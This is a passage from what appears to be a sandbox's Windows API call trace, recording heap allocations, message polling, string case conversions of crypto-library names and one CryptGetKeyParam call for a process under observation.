Size=0x10) returned 0x88cc70 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.817] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0033.817] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.818] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da278 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce98 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.818] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.818] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.818] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.819] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.819] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.819] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.819] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0033.820] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.820] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.820] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.820] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.821] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0033.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.824] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da3a8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3a8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0033.824] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.824] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.824] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0033.824] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.824] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0033.824] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.824] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0033.825] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.825] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0033.825] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.825] PeekMessageW (in: lpMsg=0x6ae83c, 